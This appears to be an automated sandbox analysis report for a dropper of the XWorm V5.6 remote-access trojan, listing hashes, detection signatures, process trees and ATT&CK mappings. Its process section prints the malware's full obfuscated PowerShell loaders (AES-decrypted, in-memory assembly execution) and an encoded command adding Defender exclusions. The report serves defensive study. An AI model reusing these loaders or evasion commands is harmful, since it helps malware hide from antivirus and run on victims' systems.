1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
30-06-2024 01:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
Size

15.6MB
MD5

ad3893ee2a8e40f2700236672635f5aa
SHA1

80f3c0bc398c473e32eeb1420218be6a5feb291d
SHA256

1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727
SHA512

748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111
SSDEEP

196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6

Score

9^/10

execution

Malware Config

Signatures

Detects Windows executables referencing non-Windows User-Agents 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\Xworm V5.6.exe	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA

Detects executables (downlaoders) containing URLs to raw contents of a paste 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\Xworm V5.6.exe	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
behavioral1/memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL

Detects executables using Telegram Chat Bot 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\Xworm V5.6.exe	INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
behavioral1/memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TelegramChatBot

Executes dropped EXE 3 IoCs

Processes:

xworm.bat.exexfixer.bat.exeXworm V5.6.exe

pid process

1752 xworm.bat.exe
2716 xfixer.bat.exe
2492 Xworm V5.6.exe
Loads dropped DLL 3 IoCs

Processes:

cmd.execmd.exe1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe

pid process

2624 cmd.exe
2636 cmd.exe
3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3020 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

xworm.bat.exepowershell.exexfixer.bat.exe

pid process

1752 xworm.bat.exe
3020 powershell.exe
2716 xfixer.bat.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

xworm.bat.exepowershell.exexfixer.bat.exe

description pid process

Token: SeDebugPrivilege 1752 xworm.bat.exe
Token: SeDebugPrivilege 3020 powershell.exe
Token: SeDebugPrivilege 2716 xfixer.bat.exe

pid	process
1752	xworm.bat.exe
2716	xfixer.bat.exe
2492	Xworm V5.6.exe

pid	process
2624	cmd.exe
2636	cmd.exe
3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe

pid	process
3020	powershell.exe

pid	process
1752	xworm.bat.exe
3020	powershell.exe
2716	xfixer.bat.exe

description	pid	process
Token: SeDebugPrivilege	1752	xworm.bat.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2716	xfixer.bat.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.execmd.execmd.exeXworm V5.6.exe

description	pid	process	target process
PID 3008 wrote to memory of 3020	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	powershell.exe
PID 3008 wrote to memory of 3020	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	powershell.exe
PID 3008 wrote to memory of 3020	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	powershell.exe
PID 3008 wrote to memory of 3020	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	powershell.exe
PID 3008 wrote to memory of 2624	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	cmd.exe
PID 3008 wrote to memory of 2624	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	cmd.exe
PID 3008 wrote to memory of 2624	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	cmd.exe
PID 3008 wrote to memory of 2624	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	cmd.exe
PID 3008 wrote to memory of 2636	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	cmd.exe
PID 3008 wrote to memory of 2636	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	cmd.exe
PID 3008 wrote to memory of 2636	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	cmd.exe
PID 3008 wrote to memory of 2636	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	cmd.exe
PID 2624 wrote to memory of 1752	2624	cmd.exe	xworm.bat.exe
PID 2624 wrote to memory of 1752	2624	cmd.exe	xworm.bat.exe
PID 2624 wrote to memory of 1752	2624	cmd.exe	xworm.bat.exe
PID 2624 wrote to memory of 1752	2624	cmd.exe	xworm.bat.exe
PID 2636 wrote to memory of 2716	2636	cmd.exe	xfixer.bat.exe
PID 2636 wrote to memory of 2716	2636	cmd.exe	xfixer.bat.exe
PID 2636 wrote to memory of 2716	2636	cmd.exe	xfixer.bat.exe
PID 2636 wrote to memory of 2716	2636	cmd.exe	xfixer.bat.exe
PID 3008 wrote to memory of 2492	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	Xworm V5.6.exe
PID 3008 wrote to memory of 2492	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	Xworm V5.6.exe
PID 3008 wrote to memory of 2492	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	Xworm V5.6.exe
PID 3008 wrote to memory of 2492	3008	1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe	Xworm V5.6.exe
PID 2492 wrote to memory of 1368	2492	Xworm V5.6.exe	WerFault.exe
PID 2492 wrote to memory of 1368	2492	Xworm V5.6.exe	WerFault.exe
PID 2492 wrote to memory of 1368	2492	Xworm V5.6.exe	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
"C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2624

C:\Users\Admin\AppData\Roaming\xworm.bat.exe
"xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2636

C:\Users\Admin\AppData\Roaming\xfixer.bat.exe
"xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
"C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2492

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2492 -s 732
3⤵
PID:1368

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\xfixer.bat
Filesize
304KB

MD5
28a668375e0d2b1cfa1d847fc44934d4

SHA1
bd0d7df2f07f879e97e02d13d9eebf0a584fabe7

SHA256
cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160

SHA512
d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c

Download Submit
C:\Users\Admin\AppData\Roaming\xworm.bat
Filesize
317KB

MD5
ada0b01d33911547bb0086e0ed152484

SHA1
ec81374c631f94c536b51dfb8c42c063bf72ca78

SHA256
aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1

SHA512
6aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26

Download Submit
C:\Users\Admin\AppData\Roaming\xworm.bat.exe
Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
\Users\Admin\AppData\Roaming\Xworm V5.6.exe
Filesize
14.9MB

MD5
56ccb739926a725e78a7acf9af52c4bb

SHA1
5b01b90137871c3c8f0d04f510c4d56b23932cbc

SHA256
90f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405

SHA512
2fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1

Download Submit
memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp

Filesize
14.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads